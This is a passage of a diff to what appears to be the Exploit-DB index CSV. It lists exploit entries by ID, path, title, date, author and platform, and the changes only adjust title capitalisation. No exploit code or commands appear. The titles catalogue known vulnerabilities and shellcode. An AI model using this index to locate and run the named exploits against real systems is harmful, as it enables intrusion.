Download",2011-04-03,KedAns-Dz,windows,remote,0 35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - Cross-Site Scripting / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0 35556,platforms/hardware/webapps/35556.txt,"CIK Telecom VoIP router SVG6000RW - Privilege Escalation / Command Execution",2014-12-17,Chako,hardware,webapps,0 -35543,platforms/php/webapps/35543.txt,"WordPress Wp Symposium 14.11 Plugin - Unauthenticated Arbitrary File Upload",2014-12-15,"Claudio Viviani",php,webapps,0 +35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 Plugin - Unauthenticated Arbitrary File Upload",2014-12-15,"Claudio Viviani",php,webapps,0 35549,platforms/unix/remote/35549.rb,"ActualAnalyzer - 'ant' Cookie Command Execution",2014-12-16,Metasploit,unix,remote,80 35545,platforms/php/remote/35545.rb,"Tuleap - PHP Unserialize Code Execution",2014-12-15,Metasploit,php,remote,80 35547,platforms/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' Parameter SQL Injection",2011-03-30,RoAd_KiLlEr,php,webapps,0 @@ -32059,15 +32059,15 @@ id,file,description,date,author,platform,type,port 35584,platforms/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind 4444/TCP Port Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 -35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP connect shellcode (77 to 85 bytes / 90 to 98 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 +35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP connect Shellcode (77 to 85 bytes / 90 to 98 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",php,remote,9000 -35589,platforms/windows/dos/35589.py,"NotePad++ 6.6.9 - Buffer Overflow",2014-12-22,TaurusOmar,windows,dos,0 +35589,platforms/windows/dos/35589.py,"Notepad++ 6.6.9 - Buffer Overflow",2014-12-22,TaurusOmar,windows,dos,0 35590,platforms/windows/local/35590.txt,"BitRaider Streaming Client 1.3.3.4098 - Privilege Escalation",2014-12-23,LiquidWorm,windows,local,0 35591,platforms/php/webapps/35591.txt,"phpMyRecipes 1.2.2 - (browse.php category parameter) SQL Injection",2014-12-23,"Manish Tanwar",php,webapps,80 35593,platforms/windows/webapps/35593.txt,"SysAid Server - Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps,0 35594,platforms/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",jsp,webapps,8443 35595,platforms/linux/local/35595.txt,"GParted 0.14.1 - OS Command Execution",2014-12-23,"SEC Consult",linux,local,0 -35596,platforms/php/webapps/35596.txt,"eGroupware 1.8.1 - 'test.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0 +35596,platforms/php/webapps/35596.txt,"eGroupWare 1.8.1 - 'test.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0 35597,platforms/hardware/remote/35597.txt,"Fiberhome HG-110 - Cross-Site Scripting / Directory Traversal",2011-04-08,Zerial,hardware,remote,0 35598,platforms/php/webapps/35598.txt,"1024 CMS 1.1.0 Beta - Multiple Input Validation Vulnerabilities",2011-04-08,"QSecure and Demetris Papapetrou",php,webapps,0 35599,platforms/asp/webapps/35599.txt,"Dimac CMS 1.3 XS - 'default.asp' SQL Injection",2011-04-11,KedAns-Dz,asp,webapps,0 @@ -32076,10 +32076,10 @@ id,file,description,date,author,platform,type,port 35602,platforms/php/webapps/35602.txt,"Etki Video PRO 2.0 - kategori.asp cat Parameter SQL Injection",2011-04-11,Kurd-Team,php,webapps,0 35603,platforms/php/webapps/35603.txt,"Wordpress Live Wire 2.3.1 Theme - Multiple Security Vulnerabilities",2011-04-11,MustLive,php,webapps,0 35604,platforms/php/webapps/35604.txt,"eForum 1.1 - '/eforum.php' Arbitrary File Upload",2011-04-09,QSecure,php,webapps,0 -35605,platforms/php/webapps/35605.txt,"Lazarus Guestbook 1.22 - Multiple Vulnerabilities",2014-12-24,TaurusOmar,php,webapps,80 +35605,platforms/php/webapps/35605.txt,"Lazarus GuestBook 1.22 - Multiple Vulnerabilities",2014-12-24,TaurusOmar,php,webapps,80 35606,platforms/linux/remote/35606.txt,"MIT Kerberos 5 - kadmind Change Password Feature Remote Code Execution",2011-04-11,"Felipe Ortega",linux,remote,0 -35607,platforms/php/webapps/35607.txt,"Spellchecker Plugin 3.1 for WordPress - 'general.php' Local File Inclusion / Remote File Inclusion",2011-04-12,"Dr Trojan",php,webapps,0 -35608,platforms/php/webapps/35608.txt,"WordPress The Gazette Edition 2.9.4 Theme - Multiple Security Vulnerabilities",2011-04-12,MustLive,php,webapps,0 +35607,platforms/php/webapps/35607.txt,"Spellchecker Plugin 3.1 for Wordpress - 'general.php' Local File Inclusion / Remote File Inclusion",2011-04-12,"Dr Trojan",php,webapps,0 +35608,platforms/php/webapps/35608.txt,"Wordpress The Gazette Edition 2.9.4 Theme - Multiple Security Vulnerabilities",2011-04-12,MustLive,php,webapps,0 35609,platforms/php/webapps/35609.txt,"WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities (1)",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35610,platforms/php/webapps/35610.txt,"Plogger 1.0 RC1 - 'gallery_name' Parameter Cross-Site Scripting",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35611,platforms/php/webapps/35611.txt,"Website Baker 2.8.1 - Multiple SQL Injections",2011-04-12,"High-Tech Bridge SA",php,webapps,0 @@ -32095,15 +32095,15 @@ id,file,description,date,author,platform,type,port 35621,platforms/php/webapps/35621.txt,"4Images 1.7.9 - Multiple Remote File Inclusions / SQL Injection",2011-04-16,KedAns-Dz,php,webapps,0 35622,platforms/windows/dos/35622.txt,"Wickr Desktop 2.2.1 Windows - Denial of Service",2014-12-27,Vulnerability-Lab,windows,dos,0 35623,platforms/multiple/webapps/35623.txt,"Pimcore 3.0 / 2.3.0 CMS - SQL Injection",2014-12-27,Vulnerability-Lab,multiple,webapps,0 -35624,platforms/php/webapps/35624.txt,"PHPLIST 3.0.6 / 3.0.10 - SQL Injection",2014-12-27,Vulnerability-Lab,php,webapps,0 +35624,platforms/php/webapps/35624.txt,"phpList 3.0.6 / 3.0.10 - SQL Injection",2014-12-27,Vulnerability-Lab,php,webapps,0 35625,platforms/php/webapps/35625.txt,"PMB 4.1.3 - Post-Authenticated SQL Injection",2014-12-27,"xd4rker dark",php,webapps,0 35626,platforms/php/webapps/35626.txt,"Easy File Sharing Webserver 6.8 - Persistent Cross-Site Scripting",2014-12-27,"Sick Psycko",php,webapps,0 -35629,platforms/php/webapps/35629.txt,"chillyCMS 1.2.1 - Multiple Remote File Inclusion",2011-04-16,KedAns-Dz,php,webapps,0 +35629,platforms/php/webapps/35629.txt,"ChillyCMS 1.2.1 - Multiple Remote File Inclusion",2011-04-16,KedAns-Dz,php,webapps,0 35630,platforms/php/webapps/35630.txt,"Joomla Component - 'com_phocadownload' Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0 35631,platforms/php/webapps/35631.txt,"CRESUS - 'recette_detail.php' SQL Injection",2011-04-19,"GrayHatz Security Group",php,webapps,0 35632,platforms/php/webapps/35632.txt,"XOOPS 2.5 - 'imagemanager.php' Local File Inclusion",2011-04-18,KedAns-Dz,php,webapps,0 35633,platforms/php/webapps/35633.txt,"Ultra Marketing Enterprises CMS and Cart - Multiple SQL Injections",2011-04-19,eXeSoul,php,webapps,0 -35634,platforms/php/webapps/35634.txt,"WordPress WP-StarsRateBox Plugin 1.1 - 'j' Parameter SQL Injection",2011-04-19,"High-Tech Bridge SA",php,webapps,0 +35634,platforms/php/webapps/35634.txt,"Wordpress WP-StarsRateBox Plugin 1.1 - 'j' Parameter SQL Injection",2011-04-19,"High-Tech Bridge SA",php,webapps,0 35635,platforms/php/webapps/35635.txt,"Dalbum 1.43 - 'editini.php' Cross-Site Scripting",2011-04-19,"High-Tech Bridge SA",php,webapps,0 35636,platforms/php/webapps/35636.txt,"ChatLakTurk php Botlu Video - 'ara.php' Cross-Site Scripting",2011-04-19,"kurdish hackers team",php,webapps,0 35637,platforms/android/remote/35637.py,"WhatsApp 2.11.476 - Remote Reboot/Crash App Android",2014-12-28,"Daniel Godoy",android,remote,0 @@ -32117,21 +32117,21 @@ id,file,description,date,author,platform,type,port 35644,platforms/linux/remote/35644.txt,"Viola DVR VIO-4/1000 - Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,linux,remote,0 35645,platforms/php/webapps/35645.txt,"Automagick Tube Script 1.4.4 - 'module' Parameter Cross-Site Scripting",2011-04-20,Kurd-Team,php,webapps,0 35647,platforms/php/webapps/35647.txt,"SyCtel Design - 'menu' Parameter Multiple Local File Inclusion",2011-04-21,"Ashiyane Digital Security Team",php,webapps,0 -35648,platforms/php/webapps/35648.txt,"Zenphoto 1.4.0.3 - '_zp_themeroot' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",php,webapps,0 +35648,platforms/php/webapps/35648.txt,"ZenPhoto 1.4.0.3 - '_zp_themeroot' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",php,webapps,0 35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Parameter Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0 35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie Parameter SQL Injection",2011-04-21,"AutoSec Tools",php,webapps,0 35651,platforms/php/webapps/35651.txt,"Dolibarr 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",php,webapps,0 35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1/7.0.0 M2/7.0.0 M3 - Pre-Authenticated Remote Code Execution",2014-12-30,drone,windows,remote,0 -35657,platforms/php/webapps/35657.php,"Sermon Browser WordPress Plugin 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 +35657,platforms/php/webapps/35657.php,"Sermon Browser Wordpress Plugin 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,php,webapps,0 35655,platforms/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Parameter Cross-Site Scripting",2011-04-25,"AutoSec Tools",php,webapps,0 35656,platforms/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 - (.pj) Heab-based Buffer Overflow",2011-04-25,KedAns-Dz,windows,dos,0 35662,platforms/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",php,webapps,0 -35664,platforms/php/webapps/35664.txt,"PHPList 2.10.x - 'email' Parameter Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 +35664,platforms/php/webapps/35664.txt,"phpList 2.10.x - 'email' Parameter Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35658,platforms/php/webapps/35658.txt,"html-edit CMS 3.1.x - 'html_output' Parameter Cross-Site Scripting",2011-04-26,KedAns-Dz,php,webapps,0 35660,platforms/php/remote/35660.rb,"ProjectSend - Arbitrary File Upload",2014-12-31,Metasploit,php,remote,80 35661,platforms/windows/local/35661.txt,"Windows 8.1 (32/64 bit) - (ahcache.sys/NtApphelpCacheControl) Privilege Escalation",2015-01-01,"Google Security Research",windows,local,0 35654,platforms/windows/dos/35654.py,"AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service",2011-04-25,"Antu Sanadi",windows,dos,0 -35663,platforms/php/webapps/35663.txt,"WP Ajax Recent Posts WordPress Plugin 1.0.1 - 'do' Parameter Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 +35663,platforms/php/webapps/35663.txt,"WP Ajax Recent Posts Wordpress Plugin 1.0.1 - 'do' Parameter Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35653,platforms/php/webapps/35653.txt,"Nuke Evolution Xtreme 2.0 - Local File Inclusion / SQL Injection",2011-04-22,KedAns-Dz,php,webapps,0 35665,platforms/php/webapps/35665.txt,"PHP F1 Max's Photo Album - 'showimage.php' Cross-Site Scripting",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35666,platforms/php/webapps/35666.txt,"Football Website Manager 1.1 - SQL Injection / Multiple HTML Injection Vulnerabilities",2011-04-26,RoAd_KiLlEr,php,webapps,0 @@ -32151,7 +32151,7 @@ id,file,description,date,author,platform,type,port 35686,platforms/windows/remote/35686.pl,"OpenMyZip 0.1 - '.zip' Buffer Overflow",2011-05-02,"C4SS!0 G0M3S",windows,remote,0 35688,platforms/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",hardware,remote,0 35699,platforms/php/webapps/35699.txt,"E2 Photo Gallery 0.9 - 'index.php' Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 -35700,platforms/php/webapps/35700.txt,"YaPIG 0.95 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-03,"High-Tech Bridge SA",php,webapps,0 +35700,platforms/php/webapps/35700.txt,"YaPiG 0.95 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35697,platforms/php/webapps/35697.txt,"Web Auction 0.3.6 - 'lang' Parameter Cross-Site Scripting",2011-05-03,"AutoSec Tools",php,webapps,0 35698,platforms/cgi/webapps/35698.txt,"Proofpoint Protection Server 5.5.5 - 'process.cgi' Cross-Site Scripting",2011-05-03,"Karan Khosla",cgi,webapps,0 35694,platforms/windows/remote/35694.txt,"SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows",2015-01-05,metacom,windows,remote,0 @@ -32172,7 +32172,7 @@ id,file,description,date,author,platform,type,port 35711,platforms/android/local/35711.c,"Nexus 5 Android 5.0 - Privilege Escalation",2015-01-06,retme,android,local,0 35715,platforms/php/webapps/35715.txt,"encoder 0.4.10 - 'edit.php' Cross-Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 35716,platforms/php/webapps/35716.html,"Ampache 3.5.4 - 'login.php' Cross-Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 -35717,platforms/php/webapps/35717.txt,"Exponent CMS 2.0.0 beta 1.1 - Local File Inclusion / Arbitrary File Upload",2011-05-09,"AutoSec Tools",php,webapps,0 +35717,platforms/php/webapps/35717.txt,"Exponent CMS 2.0.0 Beta 1.1 - Local File Inclusion / Arbitrary File Upload",2011-05-09,"AutoSec Tools",php,webapps,0 35718,platforms/php/webapps/35718.txt,"Gelsheet 1.02 - 'index.php' Cross-Site Scripting",2011-05-09,"AutoSec Tools",php,webapps,0 35719,platforms/php/webapps/35719.py,"phpWebSite 1.7.1 - 'upload.php' Arbitrary File Upload",2011-05-09,"AutoSec Tools",php,webapps,0 35720,platforms/php/webapps/35720.txt,"Microweber CMS 0.95 - SQL Injection",2015-01-07,"Pham Kien Cuong",php,webapps,80 @@ -32185,7 +32185,7 @@ id,file,description,date,author,platform,type,port 35727,platforms/php/webapps/35727.txt,"HOMEPIMA Design - 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,php,webapps,0 35728,platforms/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",asp,webapps,0 35729,platforms/multiple/remote/35729.txt,"Imperva SecureSphere - SQL Query Filter Security Bypass",2011-05-09,@drk1wi,multiple,remote,0 -35730,platforms/php/webapps/35730.txt,"WordPress Shopping Cart 3.0.4 Plugin - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80 +35730,platforms/php/webapps/35730.txt,"Wordpress Shopping Cart 3.0.4 Plugin - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80 35731,platforms/php/remote/35731.rb,"Pandora 3.1 - Authentication Bypass / Arbitrary File Upload",2015-01-08,Metasploit,php,remote,80 35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0 35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion / SQL Injection / Cross-Site Scripting",2015-01-09,Technidev,php,webapps,80 @@ -32233,7 +32233,7 @@ id,file,description,date,author,platform,type,port 35775,platforms/ios/webapps/35775.txt,"Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities",2015-01-13,Vulnerability-Lab,ios,webapps,8888 35776,platforms/java/remote/35776.rb,"Lexmark MarkVision Enterprise - Arbitrary File Upload",2015-01-13,Metasploit,java,remote,9788 35777,platforms/windows/remote/35777.rb,"Oracle MySQL for Microsoft Windows - FILE Privilege Abuse",2015-01-13,Metasploit,windows,remote,0 -35778,platforms/php/remote/35778.rb,"WordPress WP Symposium 14.11 Plugin - Arbitrary File Upload",2015-01-13,Metasploit,php,remote,80 +35778,platforms/php/remote/35778.rb,"Wordpress WP Symposium 14.11 Plugin - Arbitrary File Upload",2015-01-13,Metasploit,php,remote,80 35779,platforms/hardware/remote/35779.txt,"CiscoWorks Common Services Framework 3.1.1 Help Servlet - Cross-Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 35780,platforms/hardware/remote/35780.txt,"Cisco Unified Operations Manager 8.5 - Common Services Device Center Cross-Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 35781,platforms/java/webapps/35781.txt,"CiscoWorks Common Services 3.1.1 - Auditing Directory Traversal",2011-05-18,"Sense of Security",java,webapps,0 @@ -32276,7 +32276,7 @@ id,file,description,date,author,platform,type,port 35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x - KSM Local Denial of Service",2011-06-02,"Andrea Righi",linux,dos,0 35821,platforms/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local,0 35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0 -35823,platforms/php/webapps/35823.txt,"WordPress Pie Register Plugin 2.0.13 - Privilege Escalation",2015-01-16,"Kacper Szurek",php,webapps,80 +35823,platforms/php/webapps/35823.txt,"Wordpress Pie Register Plugin 2.0.13 - Privilege Escalation",2015-01-16,"Kacper Szurek",php,webapps,80 35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 - 'sortorder' Parameter Cross-Site Scripting",2011-06-06,Mr.ThieF,php,webapps,0 35985,platforms/php/webapps/35985.txt,"Support Incident Tracker (SiT!) 3.63 p1 - report_marketing.php exc[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 35986,platforms/php/webapps/35986.txt,"Support Incident Tracker (SiT!) 3.63 p1 - billable_incidents.php sites[] Parameter SQL Injection",2011-07-26,"Yuri Goltsev",php,webapps,0 @@ -32285,12 +32285,12 @@ id,file,description,date,author,platform,type,port 35827,platforms/windows/dos/35827.py,"JetAudio 8.1.3 - (Corrupted mp4) Crash POC",2014-12-12,"Drozdova Liudmila",windows,dos,0 35828,platforms/windows/dos/35828.py,"Winamp 5.666 build 3516 - (Corrupted flv) Crash POC",2014-12-12,"Drozdova Liudmila",windows,dos,0 35829,platforms/php/webapps/35829.txt,"Nakid CMS 1.0.2 - 'CKEditorFuncNum' Parameter Cross-Site Scripting",2011-06-06,"AutoSec Tools",php,webapps,0 -35830,platforms/php/webapps/35830.txt,"Multiple WordPress WooThemes - 'test.php' Cross-Site Scripting",2011-06-06,MustLive,php,webapps,0 +35830,platforms/php/webapps/35830.txt,"Multiple Wordpress WooThemes - 'test.php' Cross-Site Scripting",2011-06-06,MustLive,php,webapps,0 35831,platforms/php/webapps/35831.txt,"PopScript - 'index.php' Multiple Input Validation Vulnerabilities",2011-06-06,NassRawI,php,webapps,0 35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 - 'colour_picker.php' Cross-Site Scripting",2011-06-06,"Patrick Webster",php,webapps,0 35833,platforms/php/webapps/35833.txt,"Xataface 1.x - 'action' Parameter Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0 35834,platforms/php/webapps/35834.txt,"BLOG:CMS 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0 -35835,platforms/php/webapps/35835.txt,"WordPress GD Star Rating Plugin 'votes' Parameter - SQL Injection",2011-06-08,anonymous,php,webapps,0 +35835,platforms/php/webapps/35835.txt,"Wordpress GD Star Rating Plugin 'votes' Parameter - SQL Injection",2011-06-08,anonymous,php,webapps,0 35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass",2011-06-08,dst,linux,remote,0 35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 - 'email' Parameter Cross-Site Scripting",2011-06-07,LiquidWorm,php,webapps,0 35838,platforms/php/webapps/35838.txt,"Tolinet Agencia - 'id' Parameter SQL Injection",2011-06-10,"Andrea Bocchetti",php,webapps,0 @@ -32303,7 +32303,7 @@ id,file,description,date,author,platform,type,port 35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0 35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,hardware,remote,0 35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products - Authenticated File Upload",2015-01-20,Metasploit,java,remote,8080 -35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80 +35846,platforms/php/webapps/35846.txt,"Wordpress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80 35847,platforms/osx/local/35847.c,"OS X networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0 35848,platforms/osx/local/35848.c,"OS X 10.9.5 - IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0 35849,platforms/osx/dos/35849.c,"OS X 10.10 - IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0 @@ -32325,7 +32325,7 @@ id,file,description,date,author,platform,type,port 35865,platforms/php/webapps/35865.txt,"Nibbleblog - Multiple SQL Injections",2011-06-19,KedAns-Dz,php,webapps,0 35866,platforms/php/webapps/35866.txt,"Immophp 1.1.1 - Cross-Site Scripting / SQL Injection",2011-06-18,KedAns-Dz,php,webapps,0 35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 - 'sitemap.php' Cross-Site Scripting",2011-06-18,Bl4ck.Viper,php,webapps,0 -35868,platforms/linux_mips/shellcode/35868.c,"Linux/MIPS - execve /bin/sh shellcode (36 bytes)",2015-01-22,Sanguine,linux_mips,shellcode,0 +35868,platforms/linux_mips/shellcode/35868.c,"Linux/MIPS - execve /bin/sh Shellcode (36 bytes)",2015-01-22,Sanguine,linux_mips,shellcode,0 35869,platforms/windows/dos/35869.txt,"Crystal Player 1.99 - Memory Corruption",2015-01-21,"Kapil Soni",windows,dos,0 35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda Malith",windows,dos,0 35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Parameter Cross-Site Scripting",2011-06-21,"Gjoko Krstic",php,webapps,0 @@ -32336,8 +32336,8 @@ id,file,description,date,author,platform,type,port 35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 - 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0 35877,platforms/php/webapps/35877.txt,"Sitemagic CMS - 'SMTpl' Parameter Directory Traversal",2011-06-23,"Andrea Bocchetti",php,webapps,0 35878,platforms/php/webapps/35878.txt,"ecommerceMajor - SQL Injection / Authentication bypass",2015-01-22,"Manish Tanwar",php,webapps,0 -35879,platforms/php/webapps/35879.txt,"WordPress Cforms Plugin 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps,0 -35880,platforms/windows/remote/35880.html,"LEADTOOLS Imaging LEADSmtp - ActiveX Control 'SaveMessage()' Insecure Method",2011-06-23,"High-Tech Bridge SA",windows,remote,0 +35879,platforms/php/webapps/35879.txt,"Wordpress Cforms Plugin 14.7 - Remote Code Execution",2015-01-19,Zakhar,php,webapps,0 +35880,platforms/windows/remote/35880.html,"LeadTools Imaging LEADSmtp - ActiveX Control 'SaveMessage()' Insecure Method",2011-06-23,"High-Tech Bridge SA",windows,remote,0 35881,platforms/windows/remote/35881.c,"xAurora 10.00 - 'RSRC32.DLL' DLL Loading Arbitrary Code Execution",2011-06-24,"Zer0 Thunder",windows,remote,0 35882,platforms/php/webapps/35882.txt,"Nodesforum - '_nodesforum_node' Parameter SQL Injection",2011-06-23,"Andrea Bocchetti",php,webapps,0 35883,platforms/php/webapps/35883.txt,"Joomla! 'com_morfeoshow' Component - 'idm' Parameter SQL Injection",2011-06-27,Th3.xin0x,php,webapps,0 @@ -32350,7 +32350,7 @@ id,file,description,date,author,platform,type,port 35890,platforms/jsp/webapps/35890.txt,"ManageEngine ServiceDesk Plus 9.0 - SQL Injection",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,0 35891,platforms/jsp/webapps/35891.txt,"ManageEngine ServiceDesk Plus 9.0 - User Enumeration",2015-01-22,"Muhammad Ahmed Siddiqui",jsp,webapps,8080 35892,platforms/multiple/remote/35892.txt,"MySQLDriverCS 4.0.1 - SQL Injection",2011-06-27,"Qihan Luo",multiple,remote,0 -35893,platforms/php/webapps/35893.txt,"WordPress Pretty Link Lite Plugin 1.4.56 - Multiple SQL Injections",2011-06-27,MaKyOtOx,php,webapps,0 +35893,platforms/php/webapps/35893.txt,"Wordpress Pretty Link Lite Plugin 1.4.56 - Multiple SQL Injections",2011-06-27,MaKyOtOx,php,webapps,0 35894,platforms/php/webapps/35894.txt,"Joomla! CMS 1.6.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-28,"Aung Khant",php,webapps,0 35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - NULL Pointer Dereference Denial Of Service",2011-06-28,"Luigi Auriemma",windows,dos,0 35896,platforms/php/webapps/35896.txt,"FlatPress 0.1010.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-28,"High-Tech Bridge SA",php,webapps,0 @@ -32377,7 +32377,7 @@ id,file,description,date,author,platform,type,port 35991,platforms/php/webapps/35991.txt,"Pragyan CMS 3.0 - SQL Injection",2015-02-04,"Steffen Rösemann",php,webapps,80 35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80 35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0 -35916,platforms/php/webapps/35916.txt,"WordPress Photo Gallery Plugin 1.2.5 - Unrestricted File Upload",2014-11-11,"Kacper Szurek",php,webapps,80 +35916,platforms/php/webapps/35916.txt,"Wordpress Photo Gallery Plugin 1.2.5 - Unrestricted File Upload",2014-11-11,"Kacper Szurek",php,webapps,80 35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit",2015-01-27,"Todor Donev",hardware,remote,0 35918,platforms/multiple/remote/35918.c,"IBM DB2 - 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution",2011-06-30,"Tim Brown",multiple,remote,0 35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 - Multiple 'libc/net' Functions Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0 @@ -32430,7 +32430,7 @@ id,file,description,date,author,platform,type,port 35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products - Multiple SQL Injections",2011-07-18,Lazmania61,php,webapps,0 35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,php,webapps,0 35970,platforms/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ - Cross-Site Request Forgery / HTML Injection",2011-07-18,MustLive,hardware,remote,0 -35971,platforms/php/webapps/35971.txt,"WordPress bSuite Plugin 4.0.7 - Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps,0 +35971,platforms/php/webapps/35971.txt,"Wordpress bSuite Plugin 4.0.7 - Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps,0 35972,platforms/php/webapps/35972.txt,"Sefrengo CMS 1.6.1 - Multiple SQL Injections",2015-02-02,"ITAS Team",php,webapps,0 35973,platforms/php/webapps/35973.txt,"Joomla! 1.6.5 and Prior - Multiple Cross-Site Scripting Vulnerabilities",2011-07-20,"YGN 